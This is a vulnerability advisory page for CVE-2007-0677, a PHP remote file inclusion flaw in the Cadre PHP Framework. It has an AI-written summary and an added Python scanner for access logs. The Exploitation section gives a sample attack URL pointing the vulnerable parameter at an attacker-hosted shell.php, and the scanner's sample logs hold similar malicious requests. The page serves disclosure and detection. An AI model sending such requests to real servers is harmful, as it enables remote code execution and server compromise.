Unrated severity · NVD Advisory · Published Feb 3, 2007 · Updated Apr 23, 2026

CVE-2007-0677

Description

PHP remote file inclusion vulnerability in fw/class.Quick_Config_Browser.php in Cadre PHP Framework 20020724 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[config][framework_path] parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

PHP remote file inclusion in Cadre PHP Framework 20020724 allows arbitrary code execution via the GLOBALS[config][framework_path] parameter.

Vulnerability

A PHP remote file inclusion vulnerability exists in fw/class.Quick_Config_Browser.php of Cadre PHP Framework version 20020724. The script calls include_once($GLOBALS[config][framework_path] . "class.Browser.php"); without validating the path prefix, so an attacker who supplies a URL in the GLOBALS[config][framework_path] parameter controls which file is included [1][2]. No authentication or special configuration is required to reach the vulnerable code path.

Exploitation

An attacker can exploit this by sending a crafted HTTP GET request to the vulnerable script. The parameter GLOBALS[config][framework_path] is set to a URL pointing to a malicious PHP script hosted on an attacker-controlled server. For example: http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php? [1][2]. The attacker does not need any prior access or authentication; the vulnerability is remotely exploitable over the network.
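Added example, not part of the advisory or of the Cadre code base: a log check for the request pattern described above, run over constructed access-log lines. It assumes common/combined log format; the function name scan, the sample addresses and the example hosts are hypothetical.

```python
import re
from urllib.parse import parse_qsl

PARAM = "GLOBALS[config][framework_path]"      # parameter named in the advisory
SCRIPT = "fw/class.Quick_Config_Browser.php"   # script named in the advisory
# Value begins with a URL scheme or stream wrapper (http://, ftp://, php://, data:)
REMOTE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|data:)", re.IGNORECASE)
# Client address and request target from a common/combined-format log line (assumed format)
ENTRY = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan(lines):
    """Return one finding per request that sets framework_path to a remote URL."""
    findings = []
    for line in lines:
        m = ENTRY.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes, so %5B / %5D encoded brackets also match
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == PARAM and REMOTE.match(value.strip()):
                findings.append({"client": client, "path": path, "value": value,
                                 "advisory_script": path.endswith(SCRIPT)})
    return findings

# Constructed sample log lines (documentation addresses and example hosts)
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2007:10:00:01 +0000] "GET /cadre/index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Feb/2007:10:00:05 +0000] "GET /cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://files.example.net/x.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [03/Feb/2007:10:00:09 +0000] "GET /cadre/fw/class.Quick_Config_Browser.php?GLOBALS%5Bconfig%5D%5Bframework_path%5D=ftp%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 312',
    '192.0.2.44 - - [03/Feb/2007:10:01:00 +0000] "GET /cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=fw/ HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["path"], "->", f["value"])
```

This covers query-string delivery only, since standard access logs do not record request bodies.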

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the target server with the privileges of the web server process. This can lead to full compromise of the application and underlying system, including data theft, file manipulation, and further lateral movement [1][2].

Mitigation

No official patch or fixed version has been released for Cadre PHP Framework 20020724. The project appears to be unmaintained; users should consider migrating to an alternative framework or removing the vulnerable component entirely. No workaround is available that does not involve code modification [1][2].

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
